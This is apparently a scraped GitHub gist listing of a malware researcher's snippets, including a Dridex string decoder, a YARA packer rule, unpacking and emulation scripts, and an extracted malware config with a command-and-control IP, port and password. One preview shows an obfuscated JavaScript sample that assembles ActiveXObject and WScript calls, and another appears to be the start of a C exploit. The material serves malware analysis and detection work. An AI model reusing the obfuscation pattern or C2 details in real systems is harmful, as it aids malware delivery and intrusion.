Maciej Kotowicz mak
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def dridex_decode_name(addr,idx,delm="\x00"): | |
| addr += 8; tmp = ''; j = 0 | |
| xkey = GetManyBytes(addr,8) | |
| for i in range(idx+1): | |
| tmp = '' | |
| while not tmp.endswith(delm): | |
| tmp += chr(ord(xkey[j%8]) ^ Byte(addr+8+j)) | |
| j+=1 | |
| return tmp.strip(delm) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct cfg_t { | |
| int field_0; | |
| unsigned __int16 botnet; | |
| unsigned __int8 count; | |
| char unknown; | |
| ip_addr cnc[count]; | |
| }; | |
| struct ip_addr { | |
| char ipaddr[4]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "binary": "989b29681f22c0c7561e441bbf6cb64c", | |
| "password": "36b&^%rUmLV8FN#{}r\"#V)}Hc`$?}j", | |
| "filename": "ESET-%Rand%", | |
| "reg-key": "avast", | |
| "mutex": "avast", | |
| "urls": [ | |
| { | |
| "cnc": "213.152.161.69", | |
| "port": 3838 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule MadProtect : packer { | |
| meta: | |
| author = "mak" | |
| strings: | |
| $enc_hdr = { 23 59 90 70 e9 c1 ec 82 b4 87 b3 4e 03 10 6c 2e} | |
| $key_loop0 = { B0 0F 88 01 04 02 41 3C 4F 72 F7 } | |
| $key_loop1 = { B0 0F EB 02 [2] 01 04 02 41 3C 4F 72 F7 } | |
| $key_loop2 = { B0 0F EB 03 [3] 01 04 02 41 3C 4F 72 F7 } | |
| $key_loop3 = { B0 0F EB 04 [4] 01 04 02 41 3C 4F 72 F7 } | |
| $key_loop4 = { B0 0F EB 05 [5] 01 04 02 41 3C 4F 72 F7 } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import pefile | |
| from StringIO import StringIO | |
| from Crypto.Cipher import AES | |
| K =''.join((chr(x) for x in range(15,0x4f,2))) | |
| ENC_HEADER="\x23\x59\x90\x70\xe9\xc1\xec\x82\xb4\x87\xb3\x4e\x03\x10\x6c\x2e" | |
| decrypt = lambda d: AES.new(K,AES.MODE_ECB).decrypt(d) | |
| chunks = lambda l, n: [l[x: x+n] for x in xrange(0, len(l), n)] | |
| IDX = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| obj_even='fuck';obj_term='aiyyoI';obj_term='thingIm';obj_initiatives6='just';obj_terabytes3='little';obj_since='bitAiyyo7' | |
| ;obj_analytics='dispensing';obj_some0='thingIm';obj_target2='motherfucking8';obj_gigabytes='smile';obj_store4='freaks | |
| ;obj_percapita='feeding';obj_size10='this';obj_hundreds10='just5';obj_complex='itself2';obj_their1='feeding';obj_sets | |
| ='dont4';obj_simulations3='relieveAll';obj_seldom='freaks';var obj_from=this[{the2:'\u0041'}.the2+{h0:'\u0063'}.h0+{o0 | |
| :'\u0074'}.o0+{if1:'\u0069'}.if1+{a2:'\u0076'}.a2+{efe0:'\u0065'}.efe0+{ou2:'\u0058'}.ou2+{at3:'\u004f'}.at3+{l1:'\u0062'} | |
| .l1+{ccu1:'\u006a'}.ccu1+{a0:'\u0065'}.a0+{ec0:'\u0063'}.ec0+{an1:'\u0074'}.an1];var obj_thousands7=this[{eri0:'\u0057'} | |
| .eri0+{onn0:'\u0053'}.onn0+{ue0:'\u0063'}.ue0+{un2:'\u0072'}.un2+{iff1:'\u0069'}.iff1+{red3:'\u0070'}.red3+{n3:'\u0074'} | |
| .n3];var obj_data6 = obj_thousands7[{e3:'\u0043'}.e3+{art0:'\u0072'}.art0+{ec1:'\u0065'}.ec1+{l3:'\u0061'}.l3+{ea2 | |
| :'\u0074'}.ea2+{o1:'\u0065'}.o1+{ci2:'\u004f'}.ci2+{e2:'\u0062'}.e |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import pefile | |
| from unicorn import * | |
| from unicorn.x86_const import * | |
| pe = pefile.PE(sys.argv[1]) | |
| for s in pe.sections: | |
| if s.Name.strip("\x00") == '.rsrc': | |
| code_section = s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import hashlib | |
| import struct | |
| import requests | |
| def decode(data,seed,step): | |
| r = [] | |
| k = seed | |
| for c in map(ord,data): | |
| r.append(chr(c ^ k)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <fcntl.h> | |
| #include <pthread.h> | |
| #include <unistd.h> | |
| #include <sys/stat.h> | |
| #include <string.h> | |
| #include <sys/uio.h> | |
| #include <sys/wait.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import os | |
| import re | |
| import sys | |
| import math | |
| import pefile | |
| import struct | |
| import hashlib | |
| import argparse | |
| from oletools import olevba |